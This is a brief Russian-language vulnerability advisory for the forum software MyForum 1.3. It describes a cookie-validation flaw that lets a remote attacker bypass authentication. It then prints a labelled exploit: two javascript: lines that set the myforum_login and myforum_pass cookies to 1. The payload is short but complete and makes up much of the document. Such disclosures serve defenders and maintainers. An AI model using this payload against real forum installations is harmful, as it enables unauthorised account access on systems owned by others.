Программа: MyForum 1.3

Уязвимость позволяет удаленному злоумышленнику обойти ограничения
безопасности на целевой системе. Уязвимость существует из-за ошибки в проверке
входных данных при обработке cookie. Эксплуатирование уязвимости приведет к
обходу механизма аутентификации на целевой системе.

Эксплоит:

javascript:document.cookie = "myforum_login=1; path=/";

javascript:document.cookie = "myforum_pass=1; path=/";



Оставить мнение